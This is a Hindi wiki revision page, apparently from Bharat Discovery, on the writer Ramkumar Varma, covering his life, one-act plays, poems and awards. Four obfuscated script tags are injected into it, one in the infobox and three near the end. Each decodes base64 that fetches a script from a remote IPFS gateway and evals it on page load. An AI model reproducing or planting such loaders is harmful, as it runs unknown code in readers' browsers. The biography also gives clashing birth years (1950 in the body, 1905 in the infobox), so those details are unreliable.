Difference between revisions of "रामकुमार वर्मा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "हिंदी" to "हिन्दी")
Line 35: Line 35:
 
डॉ. रामकुमार वर्मा का जन्म [[मध्यप्रदेश]] के सागर ज़िले में [[15 सितंबर]] सन [[1950]] ई. में हुआ। इनके पिता लक्ष्मी प्रसाद वर्मा डिप्टी कलैक्टर थे। वर्माजी को प्रारम्भिक शिक्षा इनकी माता श्रीमती राजरानी देवी ने अपने घर पर ही दी, जो उस समय की हिन्दी कवयित्रियों में विशेष स्थान रखती थीं। बचपन में इन्हें "कुमार" के नाम से पुकारा जाता था। रामकुमार वर्मा में प्रारम्भ से ही प्रतिभा के स्पष्ट चिह्न दिखाई देते थे। ये सदैव अपनी कक्षा में प्रथम आया करते थे। पठन-पाठन की प्रतिभा के साथ ही साथ रामकुमार वर्मा शाला के अन्य कार्यों में भी काफ़ी सहयोग देते थे। अभिनेता बनने की रामकुमार वर्मा की बड़ी प्रबल इच्छा थी। अतएव इन्होंने अपने विद्यार्थी जीवन में कई नाटकों में एक सफल अभिनेता का कार्य किया है। रामकुमार वर्मा सन [[1922]] ई. में दसवीं कक्षा में पहुँचे। इसी समय प्रबल वेग से असहयोग की आँधी उठी और रामकुमार वर्मा राष्ट्र सेवा में हाथ बँटाने लगे तथा एक राष्ट्रीय कार्यकर्ता के रूप में जनता के सम्मुख आये। इसके बाद वर्माजी ने पुनः अध्ययन प्रारम्भ किया और सब परीक्षाओं में सफलता प्राप्त करते हुए प्रयाग विश्वविद्यालय से हिन्दी विषय में एम. ए. में सर्वप्रथम आये। रामकुमार वर्मा ने नागपुर विश्वविद्यालय की ओर से 'हिन्दी साहित्य का आलोचनात्मक इतिहास' पर पीएचडी की उपाधि प्राप्त की। अनेक वर्षों तक रामकुमार वर्मा प्रयाग विश्वविद्यालय के हिन्दी विभाग में प्राध्यापक तथा फिर अध्यक्ष रहे हैं।  
 
डॉ. रामकुमार वर्मा का जन्म [[मध्यप्रदेश]] के सागर ज़िले में [[15 सितंबर]] सन [[1950]] ई. में हुआ। इनके पिता लक्ष्मी प्रसाद वर्मा डिप्टी कलैक्टर थे। वर्माजी को प्रारम्भिक शिक्षा इनकी माता श्रीमती राजरानी देवी ने अपने घर पर ही दी, जो उस समय की हिन्दी कवयित्रियों में विशेष स्थान रखती थीं। बचपन में इन्हें "कुमार" के नाम से पुकारा जाता था। रामकुमार वर्मा में प्रारम्भ से ही प्रतिभा के स्पष्ट चिह्न दिखाई देते थे। ये सदैव अपनी कक्षा में प्रथम आया करते थे। पठन-पाठन की प्रतिभा के साथ ही साथ रामकुमार वर्मा शाला के अन्य कार्यों में भी काफ़ी सहयोग देते थे। अभिनेता बनने की रामकुमार वर्मा की बड़ी प्रबल इच्छा थी। अतएव इन्होंने अपने विद्यार्थी जीवन में कई नाटकों में एक सफल अभिनेता का कार्य किया है। रामकुमार वर्मा सन [[1922]] ई. में दसवीं कक्षा में पहुँचे। इसी समय प्रबल वेग से असहयोग की आँधी उठी और रामकुमार वर्मा राष्ट्र सेवा में हाथ बँटाने लगे तथा एक राष्ट्रीय कार्यकर्ता के रूप में जनता के सम्मुख आये। इसके बाद वर्माजी ने पुनः अध्ययन प्रारम्भ किया और सब परीक्षाओं में सफलता प्राप्त करते हुए प्रयाग विश्वविद्यालय से हिन्दी विषय में एम. ए. में सर्वप्रथम आये। रामकुमार वर्मा ने नागपुर विश्वविद्यालय की ओर से 'हिन्दी साहित्य का आलोचनात्मक इतिहास' पर पीएचडी की उपाधि प्राप्त की। अनेक वर्षों तक रामकुमार वर्मा प्रयाग विश्वविद्यालय के हिन्दी विभाग में प्राध्यापक तथा फिर अध्यक्ष रहे हैं।  
 
====<u>सुप्रसिद्ध कवि</u>====
 
====<u>सुप्रसिद्ध कवि</u>====
रामकुमार वर्मा आधुनिक हिन्दी साहित्य के सुप्रसिद्ध कवि, एकांकी नाटक-लेखक और आलोचक हैं। "चित्ररेखा" काव्य-संग्रह पर इन्हें हिन्दी का सर्वश्रेष्ठ "देव पुरस्कार" मिला है। साथ ही "सप्त किरण" एकांकी संग्रह पर अखिल भारतीय साहित्य सम्मेलन पुरस्कार और [[मध्यप्रदेश]] शासन परिषद से "विजयपर्व" नाटक पर प्रथम पुरस्कार मिला है। रामकुमार वर्मा रूसी सरकार के विशेष आमंत्रण पर मास्को विश्वविद्यालय के अंतर्गत प्रायः एक वर्ष तक शिक्षा कार्य कर चुके हैं। हिंदी एकांकी के जनक रामकुमार वर्मा ने ऐतिहासिक, सांस्कृतिक, मनोवैज्ञानिक, सामाजिक और साहित्यिक विषयों पर 150 से अधिक एकांकी लिखीं। [[भगवतीचरण वर्मा]] ने कहा था, "डॉ. रामकुमार वर्मा रहस्यवाद के पंडित हैं। उन्होंने रहस्यवाद के हर पहलू का अध्ययन किया है। उस पर मनन किया है। उसको समझना हो और उसका वास्तविक और वैज्ञानिक रूप देखना हो तो उसके लिए श्री वर्मा की ‘चित्ररेखा’ सर्वश्रेष्ठ काव्य ग्रंथ होगा।"
+
रामकुमार वर्मा आधुनिक हिन्दी साहित्य के सुप्रसिद्ध कवि, एकांकी नाटक-लेखक और आलोचक हैं। "चित्ररेखा" काव्य-संग्रह पर इन्हें हिन्दी का सर्वश्रेष्ठ "देव पुरस्कार" मिला है। साथ ही "सप्त किरण" एकांकी संग्रह पर अखिल भारतीय साहित्य सम्मेलन पुरस्कार और [[मध्यप्रदेश]] शासन परिषद से "विजयपर्व" नाटक पर प्रथम पुरस्कार मिला है। रामकुमार वर्मा रूसी सरकार के विशेष आमंत्रण पर मास्को विश्वविद्यालय के अंतर्गत प्रायः एक वर्ष तक शिक्षा कार्य कर चुके हैं। हिन्दी एकांकी के जनक रामकुमार वर्मा ने ऐतिहासिक, सांस्कृतिक, मनोवैज्ञानिक, सामाजिक और साहित्यिक विषयों पर 150 से अधिक एकांकी लिखीं। [[भगवतीचरण वर्मा]] ने कहा था, "डॉ. रामकुमार वर्मा रहस्यवाद के पंडित हैं। उन्होंने रहस्यवाद के हर पहलू का अध्ययन किया है। उस पर मनन किया है। उसको समझना हो और उसका वास्तविक और वैज्ञानिक रूप देखना हो तो उसके लिए श्री वर्मा की ‘चित्ररेखा’ सर्वश्रेष्ठ काव्य ग्रंथ होगा।"
 
====रुचि====
 
====रुचि====
डॉ. रामकुमार वर्मा की कविता, [[संगीत]] और [[कला|कलाओं]] में गहरी रुचि थी। [[1921]] तक आते-आते युवक रामकुमार गाँधी जी के उनके [[असहयोग आंदोलन]] में सम्मिलित हो गए। उन्होंने 17 वर्ष की आयु में एक कविता प्रतियोगिता में 51 रुपए का पुरस्कार जीता था। यहीं से उनकी साहित्यिक यात्रा आरंभ हुई थी। डॉ. रामकुमार वर्मा ने देश ही नहीं विदेशों में भी हिंदी का परचम लहराया। [[1957]] में वे मास्को विश्वविद्यालय के अध्यक्ष के रूप में सोवियत संघ की यात्रा पर गए। [[1963]] में उन्हें [[नेपाल]] के त्रिभुवन विश्वविद्यालय ने शिक्षा सहायक के रूप में आमंत्रित किया। [[1967]] में वे [[श्रीलंका]] में भारतीय भाषा विभाग के अध्यक्ष के रूप में भेजे गए।<ref>{{cite web |url=http://www.bbc.co.uk/hindi/entertainment/story/2006/09/060908_magazine_ramkumar.shtml |title=डॉ. रामकुमार वर्मा की जन्मशताब्दी |accessmonthday=[[31 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एल.एल. |publisher=बीबीसी हिन्दी |language=[[हिन्दी]] }}</ref>  
+
डॉ. रामकुमार वर्मा की कविता, [[संगीत]] और [[कला|कलाओं]] में गहरी रुचि थी। [[1921]] तक आते-आते युवक रामकुमार गाँधी जी के उनके [[असहयोग आंदोलन]] में सम्मिलित हो गए। उन्होंने 17 वर्ष की आयु में एक कविता प्रतियोगिता में 51 रुपए का पुरस्कार जीता था। यहीं से उनकी साहित्यिक यात्रा आरंभ हुई थी। डॉ. रामकुमार वर्मा ने देश ही नहीं विदेशों में भी हिन्दी का परचम लहराया। [[1957]] में वे मास्को विश्वविद्यालय के अध्यक्ष के रूप में सोवियत संघ की यात्रा पर गए। [[1963]] में उन्हें [[नेपाल]] के त्रिभुवन विश्वविद्यालय ने शिक्षा सहायक के रूप में आमंत्रित किया। [[1967]] में वे [[श्रीलंका]] में भारतीय भाषा विभाग के अध्यक्ष के रूप में भेजे गए।<ref>{{cite web |url=http://www.bbc.co.uk/hindi/entertainment/story/2006/09/060908_magazine_ramkumar.shtml |title=डॉ. रामकुमार वर्मा की जन्मशताब्दी |accessmonthday=[[31 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच.टी.एल.एल. |publisher=बीबीसी हिन्दी |language=[[हिन्दी]] }}</ref>  
  
 
;कृतियाँ
 
;कृतियाँ

Revision as of 14:06, 9 April 2011

ramakumar varma
poora nam ramakumar varma
janm 15 sitanbar, 1905
janm bhoomi sagar zila madhyapradesh
mrityu 1990 ee.
karm bhoomi madhy pradesh
karm-kshetr sahity
mukhy rachanaean aanjali, abhishap, nishith, jauhar, chittau d ki chita.
bhasha hindi
vidyalay prayag vishvavidyalay, nagapur vishvavidyalay
puraskar-upadhi dev puraskar, padm bhooshan, dilit
prasiddhi ekaankikar, alochak aur kavi
nagarikata bharatiy
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
inhean bhi dekhean kavi soochi, sahityakar soochi

d aau. ramakumar varma (janm- 15 sitanbar, 1905 - mrityu- 1990) adhunik hindi sahity mean 'ekaanki samrat' ke roop mean jane jate haian. d aau. ramakumar varma hindi bhasha ke suprasiddh sahityakar, vyangyakar aur hasy kavi ke roop mean jane jate haian. ramakumar varma ki hasy aur vyangy donoan vidhaoan mean saman roop se pak d hai. unhoanne hindi natak ko ek naya sanrachanatmak adarsh sauanpa aur naty kala ke vikas ki sanbhavanaoan ke ne path kholate hue naty sahity ko jan- jivan ke nikat pahuancha diya. natakakar aur kavi ke sath-sath unhoanne samikshak, adhyapak tatha hindi-sahity ke itihas-lekhak ke roop mean bhi hindi sahity-sarjan mean apani mahattvapoorn bhoomika nibhaee. ramakumar varma ekaankikar, alochak aur kavi haian. inake kavy mean rahasyavad aur chhayavad ki jhalak hai.

jivan parichay

d aau. ramakumar varma ka janm madhyapradesh ke sagar zile mean 15 sitanbar san 1950 ee. mean hua. inake pita lakshmi prasad varma dipti kalaiktar the. varmaji ko prarambhik shiksha inaki mata shrimati rajarani devi ne apane ghar par hi di, jo us samay ki hindi kavayitriyoan mean vishesh sthan rakhati thian. bachapan mean inhean "kumar" ke nam se pukara jata tha. ramakumar varma mean prarambh se hi pratibha ke spasht chihn dikhaee dete the. ye sadaiv apani kaksha mean pratham aya karate the. pathan-pathan ki pratibha ke sath hi sath ramakumar varma shala ke any karyoan mean bhi kafi sahayog dete the. abhineta banane ki ramakumar varma ki b di prabal ichchha thi. atev inhoanne apane vidyarthi jivan mean kee natakoan mean ek saphal abhineta ka kary kiya hai. ramakumar varma san 1922 ee. mean dasavian kaksha mean pahuanche. isi samay prabal veg se asahayog ki aandhi uthi aur ramakumar varma rashtr seva mean hath bantane lage tatha ek rashtriy karyakarta ke roop mean janata ke sammukh aye. isake bad varmaji ne punah adhyayan prarambh kiya aur sab parikshaoan mean saphalata prapt karate hue prayag vishvavidyalay se hindi vishay mean em. e. mean sarvapratham aye. ramakumar varma ne nagapur vishvavidyalay ki or se 'hindi sahity ka alochanatmak itihas' par piechadi ki upadhi prapt ki. anek varshoan tak ramakumar varma prayag vishvavidyalay ke hindi vibhag mean pradhyapak tatha phir adhyaksh rahe haian.

suprasiddh kavi

ramakumar varma adhunik hindi sahity ke suprasiddh kavi, ekaanki natak-lekhak aur alochak haian. "chitrarekha" kavy-sangrah par inhean hindi ka sarvashreshth "dev puraskar" mila hai. sath hi "sapt kiran" ekaanki sangrah par akhil bharatiy sahity sammelan puraskar aur madhyapradesh shasan parishad se "vijayaparv" natak par pratham puraskar mila hai. ramakumar varma roosi sarakar ke vishesh amantran par masko vishvavidyalay ke aantargat prayah ek varsh tak shiksha kary kar chuke haian. hindi ekaanki ke janak ramakumar varma ne aitihasik, saanskritik, manovaijnanik, samajik aur sahityik vishayoan par 150 se adhik ekaanki likhian. bhagavaticharan varma ne kaha tha, "d aau. ramakumar varma rahasyavad ke pandit haian. unhoanne rahasyavad ke har pahaloo ka adhyayan kiya hai. us par manan kiya hai. usako samajhana ho aur usaka vastavik aur vaijnanik roop dekhana ho to usake lie shri varma ki ‘chitrarekha’ sarvashreshth kavy granth hoga."

ruchi

d aau. ramakumar varma ki kavita, sangit aur kalaoan mean gahari ruchi thi. 1921 tak ate-ate yuvak ramakumar gaandhi ji ke unake asahayog aandolan mean sammilit ho ge. unhoanne 17 varsh ki ayu mean ek kavita pratiyogita mean 51 rupe ka puraskar jita tha. yahian se unaki sahityik yatra aranbh huee thi. d aau. ramakumar varma ne desh hi nahian videshoan mean bhi hindi ka paracham laharaya. 1957 mean ve masko vishvavidyalay ke adhyaksh ke roop mean soviyat sangh ki yatra par ge. 1963 mean unhean nepal ke tribhuvan vishvavidyalay ne shiksha sahayak ke roop mean amantrit kiya. 1967 mean ve shrilanka mean bharatiy bhasha vibhag ke adhyaksh ke roop mean bheje ge.[1]

kritiyaan

roos mean ramakumar varma ki rachanaean san 1922 ee. se prarambh hueean. inaki kritiyaan is prakar haian:-

  • 'vir hamir' (kavy-san 1922 ee.)
  • 'chittau d ki chianta' (kavy san 1929 ee.)
  • 'sahity samalochana' (san 1929 ee.)
  • 'aanjali' (kavy-san 1930 ee.)
  • 'abhishap' (kavita-san 1931 ee.)
  • 'hindi gitikavy' (sangrah-san 1931 ee.)
  • 'nishith' (kavita-san 1935 ee.)

chitr:Blockquote-open.gif

chitr:Blockquote-close.gif

d aau. ramakumar varma rahasyavad ke pandit haian. unhoanne rahasyavad ke har pahaloo ka adhyayan kiya hai. us par manan kiya hai. usako samajhana ho aur usaka vastavik aur vaijnanik roop dekhana ho to usake lie shri varma ki ‘chitrarekha’ sarvashreshth kavy granth hoga. - bhagavaticharan varmachitr:Blockquote-close.gif |}

  • 'chitrarekha' (kavita-san 1936 ee.)
  • 'prithviraj ki aankhean' (ekaanki sangrah-san 1938 ee.)
  • 'kabir padavali' (sangrah sampadan-san 1938 ee.)
  • 'hindi sahity ka alochanatmak itihas' (san 1939 ee.)
  • 'adhunik hindi kavy' (sangrah sampadan-san 1939 ee.)
  • 'jauhar' (kavita sangrah- 1941 ee.)
  • 'reshami taee' (ekaanki sangrah-san 1941 ee.)
  • 'shivaji' (san 1943 ee.)
  • 'char aitihasik ekaanki' (sangrah-san 1950 ee.)
  • 'rooparang' (ekaanki sangrah-san 1951 ee.)
  • 'kaumudi mahotsav'

aitihasik natak

  • 'ekalavy'
  • 'uttarayan'
  • 'o ahalya'
rachanaaian
ye gajarean taroan vale

is sote sansar bich,
jag kar, saj kar rajani bale.
kahaan bechane le jati ho,
ye gajare taroan vale?
mol karega kaun,
so rahi haian utsuk aankhean sari.
mat kumhalane do,
soonepan mean apani nidhiyaan nyari॥
nirjhar ke nirmal jal mean,
ye gajare hila hila dhona.
lahar hahar kar yadi choome to,
kianchith vichalit mat hona॥
hone do pratibimb vichumbit,
laharoan hi mean laharana.
'lo mere taroan ke gajare'
nirjhar-svar mean yah gana॥
yadi prabhat tak koee akar,
tum se hay! n mol kare.
to phooloan par os-roop mean
bikhara dena sab gajare॥

ek dipak kiran-kan hooan

dhoomr jisake kro d mean hai, us anal ka hath hooan maian,
nav prabha lekar chala hooan, par jalan ke sath hooan maian
siddhi pakar bhi, tumhari sadhana ka..
jvalit kshan hooan.
ek dipak kiran-kan hooan

vyom ke ur mean, apar bhara hua hai jo aandhera
aur jisane vishv ko, do bar kya sau bar ghera
us timir ka nash karane ke lie,
maian atal pran hooan.
ek dipak kiran-kan hooan.

shalabh ko amaratv dekar,prem par marana sikhaya
soory ka sandesh lekar,ratri ke ur mean samaya
par tumhara sneh khokar bhi
tumhari hi sharan hooan.
ek dipak kiran-kan hooan.

kholo priyatam kholo dvar...

shishir kanoan se ladi huee
kamali ke bhige haian sab tar
chalata hai pashchim ka marut
le kar shitalata ka bhar

arun kiran sam kar se chhoo lo
kholo priyatam kholo dvar....

daro na itana dhool dhoosarit
hoga nahian tumhara dvar
dho dale haian inako priyatam
in aankhoan se aansoo dhar

arun kiran sam kar se chhoo lo
kholo priyatam kholo dvar...[2]

chhayavad

d aau. varma ka kavi-vyaktitv dvivediyugin pravrittiyoan se udit hokar chhayavad kshetr mean moolyavan upalabdhi siddh hua. inaki kavyagat visheshataoan mean kalpanavritti, sangitatmakata, rahasyamay saundary-drishti (rahasyavad) ka sthan anany hai. chhayavadakal ki kavitaean inaki kavi pratibha ka sundar pratinidhitv karati haian.

rahasyavad

hindi rahasyavad ke kshetr mean inaki apani vishesh den hai. apani rahasyavadi kritiyoan mean inhoanne prakriti aur manaviy hriday ke sookshm tattvoan, jinamean alaukik satta ka abadh prakash hai, bahut b da sahara liya hai. inhoanne prakriti ki virat satta mean sarvatr eeshvariy sanket ki anubhooti ki hai. is prakar jahaan inhoanne apane is dharatal ke kavy-jagat mean ek or manav atma ki saphal premamay pravrittiyoan ki thah li hai, vahaan unhoanne prakriti ke rahasyoan ka bhi saphal aanveshan kiya hai. sarvatr bhavana kshetr mean tadvishayak abhivyakti ke lie prayah roopakoan ka sahara liya hai, jinamean ek or adhyatmik sanket haian aur doosari or ek alaukik vyanjana.

natakakar

chitr:Blockquote-open.gif

chitr:Blockquote-close.gif

kavi aur chitrakar mean bhed hai. kavi apane svar mean aur chitrakar apani rekha mean jivan ke tatv aur sauandary ka rang bharata hai. - d aau. ramakumar varmachitr:Blockquote-close.gif |} natakakar ramakumar varma ka vyaktitv kavi-vyaktitv se adhik shaktishali aur lokapriy siddh hua hai. natakakar dharatal se unaka ekaankikar svaroop hi unaki vishesh mahatta hai aur is disha mean ve adhunik hindi ekaanki ke janak kahe jate haian, jo nirvivad saty hai. prarambhik prabhav ki drishti se in par sha, ibsan maitaraliank, chekhab adi ka vishesh prabhav p da hai kiantu yah saty hai ki d aau. varma is kshetr mean, visheshakar manovegoan ki abhivyakti aur apane drishtikon mean sada maulik aur bharatiy rahe haian. "badal ki mrityu" inaka sarvapratham ekaanki natak tha, jo 1930 ee. mean "vishvamitr" mean prakashit hua tha. isake bad d aau. varma ne kramashah das minat, nahian ka rahasy, prithviraj ki aankhean, champak aur ektres adi natakoan (ekaanki) ki rachana ki tatha is uday ke bad inaka ekaankikar vyaktitv adhunik hindi natay sahity ka prakash-stabh ho gaya.

krititv

reshamitaee ke uparaant d aau. varma ke krititv mean ek vishesh dhara aitihasik ekaankiyoan ki vikasit huee, jisamean d aau. ramakumar ek aise adarshavadi kalakar ke roop mean hindi natay jagat ke samane aye, jinamean unake saanskritik aur sahityik manyataoan ka sundaratam samanvay sthapit hua hai. "ve kalush ke bhitar se pavitrata, dainy ke bhitar se shalinata, vasana ke bhitar se atmasanyam evan kshudrata se mahanata ka aanveshan karane mean samarth hue haian aur yah sab unhoanne patroan aur paristhitiyoan ke sangharsh se svabhavik roop mean prastut kiya hai."

alochak

ramakumar varma ekaankikar, alochak aur kavi haian. inake kavy mean rahasyavad aur chhayavad ki jhalak hai. alochana ke kshetr mean ramakumar varma ki kabiravishayak khoj aur unake padoan ka pratham shuddh path tatha kabir ke rahasyavad aur yogasadhana ki paddhati ki samalochana vishesh upalabdhi hai. hindi sahity ke itihas lekhan kshetr mean unake prasiddh granth hindi sahity ka alochanatmak itihas (1938 ee.) ka vishesh mahattv hai. samajik tatha shaktiyoan ke adhyayan pariprekshy mean hindi sahity ke adi yug aur madhy yug ko samagr roop mean dekhane ka yah pahala saphal prayas hai. isake atirikt kavy, kala aur sahity ke vibhinn aangoan tatha madhyamoan par lalit lekh d aau. varma ke nibandhakar vyaktitv ke sundaratam udaharan haian.

puraskar

ramakumar varma ko upanyas "chitrarekha" par dev puraskar evan ekaanki sangrah par akhil bharatiy sahity sammelan puraskar mila. inako bharat sarakar dvara padm bhooshan alankaran se vibhooshit kiya gaya. unake krititv se prabhavit hokar svitjaralaiand ke moor vishvavidyalay ne unhean dilit ki upadhi se sammanit kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. d aau. ramakumar varma ki janmashatabdi (hindi) (ech.ti.el.el.) bibisi hindi. abhigaman tithi: 31 march, 2011.
  2. d aau. ramakumar varma (hindi) (ech.ti.em.el.) ek sham mere nam. abhigaman tithi: 2 aprॅl, 2011.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>